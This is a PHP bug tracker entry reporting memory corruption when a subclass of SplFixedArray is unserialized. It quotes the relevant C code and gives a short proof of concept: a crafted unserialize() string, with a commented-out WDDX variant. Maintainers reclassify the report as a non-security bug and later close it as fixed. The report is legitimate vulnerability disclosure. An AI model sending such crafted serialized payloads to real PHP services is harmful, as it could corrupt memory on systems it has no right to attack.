php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #75006 Memory Corruption in Extended SplFixedArray
Submitted: 2017-07-30 14:22 UTC Modified: 2020-06-10 10:58 UTC
Votes:1
Avg. Score:3.0 ± 0.0
Reproduced:0 of 0 (0.0%)
From: taoguangchen at icloud dot com Assigned: nikic (profile)
Status: Closed Package: SPL related
PHP Version: 5.6.31 OS: *
Private report: No CVE-ID: None
 [2017-07-30 14:22 UTC] taoguangchen at icloud dot com
Description:
------------
Memory Corruption in Extended SplFixedArray

```
SPL_METHOD(SplFixedArray, __wakeup)
{
	spl_fixedarray_object *intern = (spl_fixedarray_object *) zend_object_store_get_object(getThis() TSRMLS_CC);
	HashPosition ptr;
	HashTable *intern_ht = zend_std_get_properties(getThis() TSRMLS_CC);
...
		zend_hash_clean(intern_ht);
```

An extended SplFixedArray can contains some properties. In during SplFixedArray deserialization, the deserialized properties will be cleaned. Then destructor call with uninitialized properties that result in memory corruption.

PoC:
```
class obj extends SplFixedArray {
	var $prop;
	function __destruct() {
		if ($this->prop) {
			// doing whatever
		}
	}
}

unserialize('O:3:"obj":1:{s:4:"prop";i:1;}');

/*
$wddx = <<<EOT
<?xml version='1.0'?>
<wddxPacket version='1.0'>
<header/>
	<data>
		<struct>
			<var name='php_class_name'>
				<string>obj</string>
			</var>
			<var name='prop'>
				<number>1</number>
			</var>
		</struct>
	</data>
</wddxPacket>
EOT;

wddx_deserialize($wddx);
*/
```


Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2017-07-31 12:45 UTC] zeev@php.net
Unserialize must not be used on untrusted input.
We don't consider issues in unserialize as security vulnerabilities - removing Private flag...
 [2017-08-02 17:23 UTC] cmb@php.net
-Type: Security +Type: Bug
 [2020-06-10 10:58 UTC] nikic@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: nikic
 [2020-06-10 10:58 UTC] nikic@php.net
Can't reproduce any corruption on current PHP versions. I believe this got fixed when the delayed wakeup was introduced.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Wed Nov 06 23:01:29 2024 UTC